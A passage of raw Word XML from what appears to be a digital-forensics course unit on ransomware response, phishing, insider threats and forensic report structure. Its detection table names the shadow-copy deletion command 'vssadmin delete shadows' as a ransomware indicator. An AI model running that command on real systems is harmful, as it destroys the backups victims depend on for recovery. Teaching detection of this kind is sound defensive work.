          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> spawned by an Office program, or a system process such as </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">svchost.exe</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> not started by </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">services.exe</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:keepNext/>
        <w:spacing w:after="160" w:before="340"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F3864"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">5.6 Ransomware Case Study</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160" w:line="300"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Ransomware</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> is malware that encrypts files (and often steals them first — </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">double extortion</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">) and demands payment for the key. Typical entry points are phishing emails, exposed remote desktop, stolen VPN credentials and unpatched servers.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:keepNext/>
        <w:spacing w:after="120" w:before="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0E7C7B"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Typical attack stages</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0E7C7B"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">■ Ransomware attack chain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rPr>
          <w:cantSplit/>
        </w:trPr>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Initial access (phishing / RDP / vulnerability)</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Execution &amp; persistence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Privilege escalation, credential theft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Lateral movement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Data theft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374"/>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Encryption &amp; ransom note</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="180"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:keepNext/>
        <w:spacing w:after="120" w:before="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0E7C7B"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Response — step by step</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631"/>
        <w:gridCol w:w="7115"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
          <w:tblHeader/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="263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711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Actions in a ransomware incident</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="263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Detection</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="711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Users report files with unusual extensions and a ransom note; EDR/SIEM alerts for mass file changes or shadow-copy deletion (</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="7A1F1F"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">vssadmin delete shadows</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="222222"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="263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Classification</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="711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P1 — critical, business impact, legal reporting duties</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="263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Containment</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="711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Isolate affected hosts and network segments; disable compromised accounts; block known IOCs; </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="222222"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">do not</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="222222"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> power off if memory may hold decryption material</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="263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Evidence preservation</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="711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Capture RAM and images of patient-zero and key servers; keep the ransom note, sample and logs; hash and record chain of custody</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="263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Investigation</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="711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 the initial access, the malware family, which data was stolen, persistence and account compromise; produce IOCs</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="263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Eradication</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="711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Remove malware and persistence, close the entry point, reset all credentials (including domain admin and service accounts)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="263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Recovery</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="711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Restore from clean, offline backups; rebuild systems; validate; monitor closely</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="263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Post-incident</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="711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Lessons learned; improve backups (3-2-1 rule: 3 copies, 2 media, 1 offline), patching, MFA, segmentation, email filtering; legal/regulatory reporting; decision on payment taken by senior management with legal advice — </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="222222"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">payment never guarantees recovery</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Real-world examples</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="70" w:line="280"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="222222"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">Colonial Pipeline (USA, 2021):</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="222222"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve"> A ransomware attack (DarkSide group) via a compromised VPN account led the company to shut down pipeline operations as a precaution and caused fuel shortages. It showed how IT compromise can disrupt operations and why account security matters.</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:line="280"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="222222"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">AIIMS Delhi (India, 2022):</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="222222"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve"> A ransomware attack on the hospital’s servers disrupted services for days and forced staff to work manually. It showed the impact on critical healthcare services and the value of backups and network segmentation.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="180"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:keepNext/>
        <w:spacing w:after="160" w:before="340"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F3864"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">5.7 Phishing and Insider-Threat Response</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:keepNext/>
        <w:spacing w:after="120" w:before="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0E7C7B"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Phishing</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:spacing w:after="90" w:line="290"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Analyse the email</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — headers, sender, links, attachments (see Unit IV).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:spacing w:after="90" w:line="290"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Identify who received and who clicked</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — mail-gateway logs, proxy logs, EDR.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:spacing w:after="90" w:line="290"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Check for account compromise</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — unusual logins, forwarding rules, MFA prompts.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:spacing w:after="90" w:line="290"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Extract IOCs</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — URLs, domains, IPs, file hashes, sender addresses.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:spacing w:after="90" w:line="290"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Block and remove</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — block IOCs, delete the email from all mailboxes.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:spacing w:after="90" w:line="290"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Reset credentials</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> for affected users, and re-educate users.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:keepNext/>
        <w:spacing w:after="120" w:before="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0E7C7B"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Insider threat</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160" w:line="300"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">An </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">insider threat</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> is a risk from someone with authorised access (employee, contractor) who misuses it deliberately or by mistake. Investigations are </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">sensitive</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: the person has legitimate access, so activity looks normal at first. Work should be discreet, authorised by management/HR/legal, and </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">evidence-based</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Preserve relevant evidence early (mailbox, endpoint, logs, access records) and keep chain of custody.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="90" w:line="290"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Analyse user activity: file access, USB use, uploads, printing, email, after-hours logins.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="90" w:line="290"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Compare with the person’s normal behaviour and role.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="90" w:line="290"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Involve HR and legal before any interview or action; avoid alerting the person too early.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="90" w:line="290"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Document facts carefully; do not accuse — report what the evidence shows.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:keepNext/>
        <w:spacing w:after="160" w:before="340"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F3864"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">5.8 Forensic Report Writing</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160" w:line="300"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">The report is the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">final product</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> of the investigation. Nobody can use your findings unless they can read and trust them. A forensic report should be </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">accurate, clear, objective, complete, reproducible and legally defensible</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:keepNext/>
        <w:spacing w:after="120" w:before="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0E7C7B"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Structure of a forensic report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Contents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1. Cover page / case details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Case number, title, date, requesting party, investigator’s name and qualification, confidentiality marking</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2. Executive summary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One page, plain language: what was asked, what was found, the main conclusion, and top recommendations. For management and non-technical readers.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3. Scope and objectives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What was examined (systems, devices, time period) and what was not; the questions to answer; legal authority</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4. Evidence and chain of custody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 of items, descriptions, serial numbers, acquisition details, hash values, chain-of-custody forms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5. Methodology</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How evidence was acquired, preserved, examined and analysed — in steps another expert can repeat</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 Tools used</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 names, </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="222222"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">version numbers</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="222222"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
